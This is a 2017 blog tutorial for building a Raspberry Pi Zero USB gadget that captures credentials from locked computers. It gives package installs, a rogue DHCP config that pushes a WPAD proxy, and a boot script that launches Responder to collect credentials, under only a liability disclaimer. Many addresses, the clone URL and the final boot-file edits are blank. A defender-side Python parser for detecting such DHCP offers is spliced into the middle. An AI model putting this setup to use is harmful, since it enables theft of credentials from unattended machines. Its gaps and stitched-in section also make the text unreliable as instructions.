Snagging Credentials from Locked Machines with Raspberry Pi Zero

I get really excited any time I get to use my Raspberry Pi Zero. When I saw Rob Fuller's tweet this morning (@mubix), I got really excited. Coincidentally, I have had a thing for single-board computers and had been playing with the USB Gadget mode on the Pi Zero for the last couple of weeks. As soon as I saw the tweet, I knew I had to do this with the Pi Zero.


This is a proof of concept. Please think before you apply this in the real world.


Any actions and/or activities related to the material contained within this website are solely your responsibility. The misuse of the information on this website can result in criminal charges being brought against the persons in question. The authors and elevatedprompt will not be held responsible in the event that any criminal charges are brought against any individuals misusing the information on this website to break the law.




  1. RaspberryPi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD card. I went with the Raspbian Lite version, as it is better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the required software:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone


Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static



Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet netmask {
option routers;
option local-proxy-config "";
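
The dhcpd.conf above is what makes the technique work on the victim side: the Pi's DHCP server hands the host a gateway, a DNS server and, through option 252 (local-proxy-config), a WPAD proxy URL, on a 60-second lease. Those same traits are what a defender can look for. The following is an added example, not code from the original post or from Responder: it parses the option TLVs of a DHCP OFFER/ACK and flags a WPAD URL and an unusually short lease. The packets, the proxy URL (a .invalid host) and the 300-second threshold are all constructed for the example.

```python
"""Defender-side check for DHCP offers that look like a rogue USB-gadget server.

Added example (not from the original post). Parses the option TLVs of a
BOOTP/DHCP payload and reports the traits the dhcpd.conf above produces:
an option 252 (WPAD) proxy string and a very short lease. Python 3 only,
standard library only.
"""
import struct
from typing import Dict, List, Optional

DHCP_MAGIC_COOKIE = b"\x63\x82\x53\x63"  # marks the start of the options field
OPT_PAD = 0
OPT_LEASE_TIME = 51     # 4-byte lease in seconds (default-lease-time above)
OPT_MSG_TYPE = 53       # 2 = OFFER, 5 = ACK
OPT_WPAD = 252          # "option local-proxy-config code 252 = text"
OPT_END = 255


def parse_dhcp_options(packet: bytes) -> Dict[int, bytes]:
    """Return {option_code: raw_value} from a DHCP payload (the UDP data)."""
    # The fixed BOOTP header is 236 bytes; the magic cookie must follow it.
    if len(packet) < 240 or packet[236:240] != DHCP_MAGIC_COOKIE:
        raise ValueError("not a DHCP packet (magic cookie missing)")
    opts: Dict[int, bytes] = {}
    i = 240
    while i < len(packet):
        code = packet[i]
        if code == OPT_PAD:          # single-byte padding, no length field
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 1 >= len(packet):
            raise ValueError("truncated option header")
        length = packet[i + 1]
        value = packet[i + 2 : i + 2 + length]
        if len(value) != length:     # refuse to read past the buffer
            raise ValueError("truncated option value")
        opts[code] = value
        i += 2 + length
    return opts


def assess_offer(opts: Dict[int, bytes], max_sane_lease: int = 300) -> List[str]:
    """Return human-readable findings for a parsed server-to-client DHCP message."""
    findings: List[str] = []
    msg_type = opts.get(OPT_MSG_TYPE, b"\x00")[0]
    if msg_type not in (2, 5):       # only OFFER and ACK carry the offered config
        return findings
    if OPT_WPAD in opts:
        url = opts[OPT_WPAD].decode("ascii", "replace")
        findings.append("option 252 (WPAD proxy URL) present: %r" % url)
    if OPT_LEASE_TIME in opts and len(opts[OPT_LEASE_TIME]) == 4:
        lease = struct.unpack("!I", opts[OPT_LEASE_TIME])[0]
        if lease < max_sane_lease:
            findings.append("very short lease of %d s (threshold %d s)" % (lease, max_sane_lease))
    return findings


def build_offer(lease_seconds: int, wpad: Optional[bytes]) -> bytes:
    """Build a minimal, constructed DHCP OFFER for testing the parser offline."""
    # op=2 (BOOTREPLY), htype=1 (Ethernet), hlen=6, hops=0; remaining header zeroed.
    header = bytes([2, 1, 6, 0]) + bytes(232)
    opts = bytes([OPT_MSG_TYPE, 1, 2])
    opts += bytes([OPT_LEASE_TIME, 4]) + struct.pack("!I", lease_seconds)
    if wpad is not None:
        opts += bytes([OPT_WPAD, len(wpad)]) + wpad
    opts += bytes([OPT_END])
    return header + DHCP_MAGIC_COOKIE + opts


# Constructed samples: a normal one-day lease with no proxy, and a rogue-looking
# 60-second lease pushing a WPAD URL (hostname deliberately under .invalid).
NORMAL_OFFER = build_offer(86400, None)
ROGUE_OFFER = build_offer(60, b"http://proxy.invalid/wpad.dat")

if __name__ == "__main__":
    for name, pkt in (("normal", NORMAL_OFFER), ("rogue", ROGUE_OFFER)):
        print(name, assess_offer(parse_dhcp_options(pkt)) or ["no findings"])
```

To use this on real traffic, feed it the UDP payload of each DHCP OFFER or ACK seen on a host (for example from a packet capture taken when an unknown USB network adapter enumerates); an offer that carries option 252 from an adapter the user never plugged in is the signal worth alerting on, and not honouring WPAD from DHCP at all removes the proxy half of the trick.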


Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'


Become root (sudo su), open ~/.screenrc with nano and add this:
# Logging
deflog on
logfile /root/logs/screenlog_${USER}.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed, shut down the Pi Zero (shutdown -h now) and remove the Micro SD card. Connect the Micro SD card to your computer. We will need to modify config.txt and cmdline.txt to turn the OTG port into a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016.



Add this after the last line:



After rootwait (the last word on the first line) add a space and then


Published 2017-03-19. Categories: How To's

